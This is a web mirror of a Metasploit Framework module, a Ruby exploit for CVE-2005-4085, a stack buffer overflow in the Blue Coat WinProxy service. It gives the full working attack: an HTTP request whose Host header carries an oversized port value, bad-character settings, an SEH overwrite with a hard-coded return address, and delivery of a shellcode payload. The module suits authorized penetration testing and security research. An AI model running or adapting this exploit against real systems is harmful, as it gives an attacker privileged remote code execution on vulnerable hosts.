Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
rapid7
GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/modules/exploits/windows/proxy/bluecoat_winproxy_host.rb
19591 views
1
##

2
# This module requires Metasploit: https://metasploit.com/download

3
# Current source: https://github.com/rapid7/metasploit-framework

4
##

5


6
class MetasploitModule < Msf::Exploit::Remote

7
  Rank = GreatRanking

8


9
  HttpFingerprint = { :method => 'HEAD', :pattern => [ /BlueCoat/ ] }

10


11
  include Msf::Exploit::Remote::Tcp

12
  include Msf::Exploit::Remote::Seh

13


14
  def initialize(info = {})

15
    super(

16
      update_info(

17
        info,

18
        'Name' => 'Blue Coat WinProxy Host Header Overflow',

19
        'Description' => %q{

20
          This module exploits a buffer overflow in the Blue Coat Systems WinProxy

21
          service by sending a long port value for the Host header in a HTTP

22
          request.

23
        },

24
        'Author' => 'MC',

25
        'License' => MSF_LICENSE,

26
        'References' => [

27
          ['CVE', '2005-4085'],

28
          ['OSVDB', '22238'],

29
          ['BID', '16147'],

30
          ['URL', 'http://www.bluecoat.com/support/knowledge/advisory_host_header_stack_overflow.html'],

31
        ],

32
        'DefaultOptions' => {

33
          'EXITFUNC' => 'thread',

34
        },

35
        'Payload' => {

36
          'Space' => 600,

37
          'BadChars' => "\x00\x3a\x26\x3f\x25\x23\x20\x0a\x0d\x2f\x2b\x0b\x5c",

38
          'StackAdjustment' => -3500,

39
        },

40
        'Platform' => 'win',

41
        'Targets' => [

42
          [ 'WinProxy <= 6.1 R1a Universal', { 'Ret' => 0x6020ba04 } ], # Asmdat.dll

43
        ],

44
        'Privileged' => true,

45
        'DisclosureDate' => '2005-01-05',

46
        'DefaultTarget' => 0,

47
        'Notes' => {

48
          'Reliability' => UNKNOWN_RELIABILITY,

49
          'Stability' => UNKNOWN_STABILITY,

50
          'SideEffects' => UNKNOWN_SIDE_EFFECTS

51
        }

52
      )

53
    )

54


55
    register_options(

56
      [

57
        Opt::RPORT(80)

58
      ]

59
    )

60
  end

61


62
  def exploit

63
    connect

64


65
    print_status("Trying target #{target.name}...")

66


67
    sploit = "GET / HTTP/1.1" + "\r\n"

68
    sploit += "Host: 127.0.0.1:"

69
    sploit += rand_text_english(31, payload_badchars)

70
    seh = generate_seh_payload(target.ret)

71
    sploit[23, seh.length] = seh

72
    sploit += "\r\n\r\n"

73


74
    sock.put(sploit)

75
    sock.get_once(-1, 3)

76


77
    handler

78
    disconnect

79
  end

80
end

81


82